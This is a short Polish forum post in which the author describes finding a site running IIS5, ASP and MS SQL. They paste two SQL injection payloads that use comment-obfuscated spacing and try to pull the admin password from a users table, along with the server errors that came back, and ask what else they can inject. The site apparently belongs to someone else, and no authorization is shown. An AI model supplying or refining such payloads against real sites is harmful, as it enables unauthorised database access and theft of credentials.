Znalazlem weba i jest to IIS5 + asp + sql j.w
?id=(select/**/min(pass)/**/from/**/users/**/where/**/user=%22admin%22)/**/--
Kod:
Microsoft OLE DB Provider for SQL Server error '80040e37'
Invalid object name 'users'.
(...).asp, line 22
lekko zmieniamy zapytanie:
?id=(select/**/min(pass)/**/from/**/user/**/where/**/user=%22admin%22)/**/--
Kod:
Microsoft OLE DB Provider for SQL Server error '80040e14'
Incorrect syntax near the keyword 'user'.
(...).asp, line 22
I co to jest podatne na injecta? ten mssql jest jakis inny.. (czytam wlasnie o nim mimo poznej... wczesnej pory dnia... nocy)
Co moge mu windzektowac ciekawego?